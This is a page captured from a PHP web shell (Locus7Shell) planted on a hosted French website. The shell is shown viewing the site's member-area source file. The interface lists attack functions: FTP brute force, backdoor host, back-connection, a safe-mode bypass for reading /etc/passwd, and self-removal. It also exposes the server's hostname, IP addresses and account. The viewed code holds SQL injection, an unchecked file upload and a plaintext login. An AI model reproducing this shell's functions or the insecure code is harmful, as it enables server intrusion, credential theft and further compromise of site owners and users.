Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/   drwx---r-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     Member.php (3.6 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

if (isset($_SESSION['identifiant']))
{
    
$user $_SESSION['identifiant'];


//mise en place de l'avatar
//connection à la database
include ("connect.php");
$query mysql_query("SELECT * FROM users WHERE PSEUDO='$user'");
$numquery mysql_num_rows($query);

    if (
$numquery==0)
       die(
"Utilisateur non trouvé!");
       else
    {
    
       echo 
"<br>";
       
$row mysql_fetch_assoc($query);
       
$location $row['IMAGELOCATION'];
       
$numclient $row['NUM_CLIENT'];
       
      echo
' <span class="Style5">
      <table width="500" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td valign="top"><img src='
.$location.' width="100" height="100"></td>
    <td><a href="index.php?page=uploadavatar">Modifier votre avatar</a>
       <br><a href="index.php?page=changepassword">Modifier votre mot de passe</a>
       <br><a href="index.php?page=deletecat">Supprimer une catégorie</a>
       <br><a href="https://logs.ovh.net/mycocharentes.fr/urchin6/">Statistiques du site</a>
       <br><a href="index.php?page=Excel">Nouveau: Listing pour fichier Excel</a>
       <br><img src="image/transparent.png" width="50" height="10" /><em>Login: patrice <img src="image/transparent.png" width="30" height="10" />Mot de passe: password</em>
       <br>'
;
       
        if (isset(
$_GET['ajout3']))
                    {
                    echo
" <form action='index.php?page=Member&add3=1' method='POST' enctype='multipart/form-data'>
                    <table width='700'><td>
                    <tr>Photo: <input type='file' name='myfile'></tr>
                    <tr><td><input type='submit' name='sup5' value='Ajouter'></td></tr></table>
                    </form><br><br><br><br><br>"
;
                    }
                    else
                    {
                    if (isset(
$_GET['add3']))
                    {
                    
$name $_FILES['myfile']['name'];
                    
$name strtr($name'ÁÀÂÄÃÅÇÉÈÊËÍÏÎÌÑÓÒÔÖÕÚÙÛÜÝ''AAAAAACEEEEEIIIINOOOOOUUUUY');
                    
$name strtr($name'áàâäãåçéèêëíìîïñóòôöõúùûüýÿ/''aaaaaaceeeeiiiinooooouuuuyy_');
                    
$size $_FILES['myfile']['size']; //voir le tutorial upload pour vérifier que c'est une image
                    
$tmp_name $_FILES['myfile']['tmp_name'];
                    
                    if (
$name)
                         {
                          
//Chargement en cours
                          
$location ="image/photo/$name";
                          
$location2 ='<div align="center"><img src="image/photo/'.$name.'"/></div>';
                          
move_uploaded_file($tmp_name,$location); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
                         
$quer mysql_query("INSERT INTO photo VALUES ('','$location2')");
                                   echo 
"Ajout réussi: <input name='textfield' type='text' value='"; echo ''.$location2.''; echo "' size='70' maxlength='200' /> ";
                         }
                    else
                         echo(
"Sélectionner un fichier!");

                    
                    }
                    else
                    {
                    echo
" <div align='left'><form action='index.php?page=Member&ajout3=1' method='POST' enctype='multipart/form-data'>
                    <input type='submit' name='sup2' value='Ajouter une Photo'>
                    </form></div><br>"
;
                    }
                    }
  echo 
'
       
       
       </tr>
</table>
</span>'
;

    }
//fin pour la création de l'avatar    
}
else 
{
   echo 
"<html>
    <br>
    <span class='Style5'>
    <form action='login.php' method='POST'>
    <table width='400' border='0' cellspacing='0' cellpadding='0'>
  <tr>
    <td>Identifiant:  </td>
    <td><input type='text' name='identifiant'/><br>
        <img src='image/transparent.png' width='30' height='4' /></td>
  </tr>
  <tr>
    <td>Mot de passe: </td>
    <td><input type='password' name='password'/><br>
        <img src='image/transparent.png' width='30' height='4' /></td>
  </tr>
</table>
        <input type='submit' value='Connexion'>
    </form> <span> <p>

</html>"
;
}

?>

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0055 ]--